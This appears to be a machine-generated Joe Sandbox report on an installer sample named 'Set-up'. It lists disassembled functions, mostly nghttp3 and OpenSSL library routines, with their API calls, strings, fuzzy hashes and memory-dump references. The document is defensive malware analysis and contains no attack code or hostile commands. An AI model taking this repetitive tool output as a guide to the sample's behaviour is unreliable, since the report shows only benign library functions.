Opcode Fuzzy Hash: cca133013a116d53a448ff934384644f151ccf1b99d6f45ce66b1454f5bfae0f
Instruction Fuzzy Hash: 56D1AEB2508305BFD700AF58DC81E6BBBE9EBC4344F59492CF94563252E631ED54CBA2

Function 00D2C520 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - rbuf->last) == len,nghttp3_qpack.c,000004D0,?,?,?,?,?,?,00D2B434,?,?,00000000,00000000,?,?), ref: 00D2C68A

Strings

nghttp3_qpack.c, xrefs: 00D2C680
(size_t)(p - rbuf->last) == len, xrefs: 00D2C685

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - rbuf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-2159148421
Opcode ID: 9db7ca6bb58161bcad6a49ea4c89d1da9caa87c83f4123d2607db9ff3e27a84e
Instruction ID: 1836e2726ab1ca0cf31793c137c6761eea8b671c6be7329627c6b72be1fe269e
Opcode Fuzzy Hash: 9db7ca6bb58161bcad6a49ea4c89d1da9caa87c83f4123d2607db9ff3e27a84e
Instruction Fuzzy Hash: 8B4116717193104FD7099A2CE89076EB7D2EFE9318F18867CE889CB392D935DD0587A1

Function 00D32600 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len,nghttp3_qpack.c,00000EB7,?,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00D327D1

Strings

nghttp3_qpack.c, xrefs: 00D327C7
nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len, xrefs: 00D327CC

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len$nghttp3_qpack.c
API String ID: 1222420520-645767172
Opcode ID: 1f3e8453312123aad4bd6e7d6b6a2dc20e480a866e3732b67103b7013ed16312
Instruction ID: c8c03b6eea5ac9dc63a79fc1241ef993d32a150d4b23b28d4fdcf533482eeed1
Opcode Fuzzy Hash: 1f3e8453312123aad4bd6e7d6b6a2dc20e480a866e3732b67103b7013ed16312
Instruction Fuzzy Hash: 5651D675E043144FD704AE2CD880B2AB7D6FF98314F19467CEC989B382EA35DD058BA1

Function 00E749A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(?,00000000,00CF836A,?,?,0000012C,000000FF), ref: 00E749BA

Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8

Strings

crypto/ocsp/ocsp_cl.c, xrefs: 00E74A0F, 00E74A7C, 00E74B0F, 00E74B4A
OCSP_check_validity, xrefs: 00E74A05, 00E74A76, 00E74B09, 00E74B40

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strcpystrlen$_time64
String ID: OCSP_check_validity$crypto/ocsp/ocsp_cl.c
API String ID: 3821555430-713967112
Opcode ID: bc18245b2035634df48dbb6700951eb78aaa467552c433531e85c2599018aac6
Instruction ID: d64344434228534a4e7b5e31e4ff47544f61f0eb15f1fd9f22e88968f7634bea
Opcode Fuzzy Hash: bc18245b2035634df48dbb6700951eb78aaa467552c433531e85c2599018aac6
Instruction Fuzzy Hash: 3141C1F6F4831577D7207A25AC46B5B3B958F84758F049428FD8CB73C2E675E90082A2

Function 00D245C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,?,?,?,?), ref: 00D2468C

Strings

tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00D24687
nghttp3_conn.c, xrefs: 00D24682

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: 5c9b66cfac41e7940881caf78ccd0c9415b81fc286fef5e9b39bb4c0dc66f3b6
Instruction ID: 964599f64cc09b031b4219690e0d3c6ae79923ecd5dd7fd5fe77024f39c51283
Opcode Fuzzy Hash: 5c9b66cfac41e7940881caf78ccd0c9415b81fc286fef5e9b39bb4c0dc66f3b6
Instruction Fuzzy Hash: 8631F4716002116BD210DA29FC85EABB7ECEFD6369F080629FD58C3281E731E814C7B1

Function 00D24400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 00D244B7

Strings

tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00D244B2
nghttp3_conn.c, xrefs: 00D244AD

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: 5e9ae20f9159245a569b18e2c4a3907ec644a850aa3d5d8bfd83dac2d9498ecd
Instruction ID: 9544f2d9d683504f92975881130e75cc49d77a19bad2fca574c5078ad8cb04f0
Opcode Fuzzy Hash: 5e9ae20f9159245a569b18e2c4a3907ec644a850aa3d5d8bfd83dac2d9498ecd
Instruction Fuzzy Hash: 2521F272100721ABEB116A65ED01F6777DEDFA4329F080468FD18C6162FB76D4158771

Function 00FFA0C0 Relevance: 5.3, APIs: 4, Instructions: 327COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00FFA161
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00FFA2D1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00FFA3EC
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00FFA499

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 09734a971d87862f1d040c4db9cb224f07ce9b8a4e7fa16dbcd3f142039f386a
Instruction ID: 9de0153a2168b9e59dce42ffa9d654dfc57f3f0f7b38f06b0aad36f8e85fbf70
Opcode Fuzzy Hash: 09734a971d87862f1d040c4db9cb224f07ce9b8a4e7fa16dbcd3f142039f386a
Instruction Fuzzy Hash: 6CC19FB2A043149FCB04DF28C8C4A6A7BE5BF88314F1545ADEA498B366D771EC40DF96

Function 00D26140 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < len || offset == 0,nghttp3_stream.c,00000371,00000000,00CFD7A7,?,?,00CFD7A7), ref: 00D261CF

Strings

i < len || offset == 0, xrefs: 00D261CA
nghttp3_stream.c, xrefs: 00D261C5

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: i < len || offset == 0$nghttp3_stream.c
API String ID: 1222420520-1528673747
Opcode ID: 0b0267d26cc0e729135885eeb52dba560bcc1e3b74d951efc53036e1b7010848
Instruction ID: 3107dc3b556346189f9e01da5b3d9ae2b00319e6b6e39e5764e6e681e18f7b5d
Opcode Fuzzy Hash: 0b0267d26cc0e729135885eeb52dba560bcc1e3b74d951efc53036e1b7010848
Instruction Fuzzy Hash: CD11C4755043108FD305EF29D888FAA77E4FF98324F0904BDE94847353DA31A945CBA1

Function 00D28700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((blklen & 0xfu) == 0,nghttp3_balloc.c,00000022,00D288D3,00000010,?,?,00000000,00D29AE3,00D2ACDD,-00000010,?,?,?,00000000,?), ref: 00D2873C

Strings

(blklen & 0xfu) == 0, xrefs: 00D28737
nghttp3_balloc.c, xrefs: 00D28732

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (blklen & 0xfu) == 0$nghttp3_balloc.c
API String ID: 1222420520-1502420682
Opcode ID: 12a7bf861f100fbe8c5bc1e7188e31d7634d6e82762b26a2c3e56707688dfe25
Instruction ID: 46aa5f186d67ce9d5391200a66938d3279104a5d7a5037b248a72e7ca4e65f23
Opcode Fuzzy Hash: 12a7bf861f100fbe8c5bc1e7188e31d7634d6e82762b26a2c3e56707688dfe25
Instruction Fuzzy Hash: E311D679A0A3505FC3229F14EC41B56BFB1AFA2718F1D849DE848AB297D7309C04D771

Function 00D289F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

_byteswap_uint64.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFF3F,?,nghttp3_conv.c,0000003D,nghttp3_get_varint,00D25084,?,?), ref: 00D28A31

Strings

nghttp3_get_varint, xrefs: 00D28A4C
nghttp3_conv.c, xrefs: 00D28A53

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _byteswap_uint64
String ID: nghttp3_conv.c$nghttp3_get_varint
API String ID: 1624361598-912089391
Opcode ID: 7454569e2fb3f4f894e49a03bf0d9b7ba34d5e53071f1ebdde23890b69a1a957
Instruction ID: ab5c66796fdab8b5822f92388c18ffd29a38df08b9aba86143c1ce5a400797f9
Opcode Fuzzy Hash: 7454569e2fb3f4f894e49a03bf0d9b7ba34d5e53071f1ebdde23890b69a1a957
Instruction Fuzzy Hash: 75F02BB25110525BD704DF39E881939B7D2EBA3312F4CC2E5F494CA4C8CB74C991E720

Function 00D20300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp3_rcbuf.c,0000005E,00D30B2D,5308C483,00000000,00D24D9F,?,00D20EC8), ref: 00D20333

Strings

nghttp3_rcbuf.c, xrefs: 00D20329
rcbuf->ref > 0, xrefs: 00D2032E

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_rcbuf.c$rcbuf->ref > 0
API String ID: 1222420520-1879435254
Opcode ID: 1a1b485eec004e44c4d8d1a557b69be3e7d331b8dd02dff8ed19f3db26e5a0a3
Instruction ID: 1afc55e54f60020e2f1e4a45313bc5b6d9543b7e4435dedb17a1303052049d50
Opcode Fuzzy Hash: 1a1b485eec004e44c4d8d1a557b69be3e7d331b8dd02dff8ed19f3db26e5a0a3
Instruction Fuzzy Hash: 21E030382006049FCA14CB08E955E25BBA5AFA971AF9CC19CF40887293D771DC01DA21

Function 00E5A170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

Part of subcall function 00E59F60: GetStdHandle.KERNEL32(000000F4), ref: 00E59F76
Part of subcall function 00E59F60: GetFileType.KERNEL32(00000000), ref: 00E59F83
Part of subcall function 00E59F60: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 00E59FBB

raise.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000016,00E5D8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,00E5DF70,?,?,?,?,?,?,?,00000000), ref: 00E5A18B
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000003,?,00E5D8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,00E5DF70,?,?,?,?,?,?,?), ref: 00E5A195

Strings

%s:%d: OpenSSL internal error: %s, xrefs: 00E5A17C

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: File$HandleTypeWrite_exitraise
String ID: %s:%d: OpenSSL internal error: %s
API String ID: 2477291680-569889646
Opcode ID: 8a92887959107d191775d9e90bdf9fc9e625470af2e996075ba2a5e0635a602f
Instruction ID: b9d8582b774ca2603fda1f1b2973a8b1d30a031990acfcc066e8154d5c9671ff
Opcode Fuzzy Hash: 8a92887959107d191775d9e90bdf9fc9e625470af2e996075ba2a5e0635a602f
Instruction Fuzzy Hash: 15C01272E4434AABFB037ED04C02ABAB665BF75700F086D1EB698240D2D6639538B617

Function 01004230 Relevance: 5.0, APIs: 4, Instructions: 44COMMON
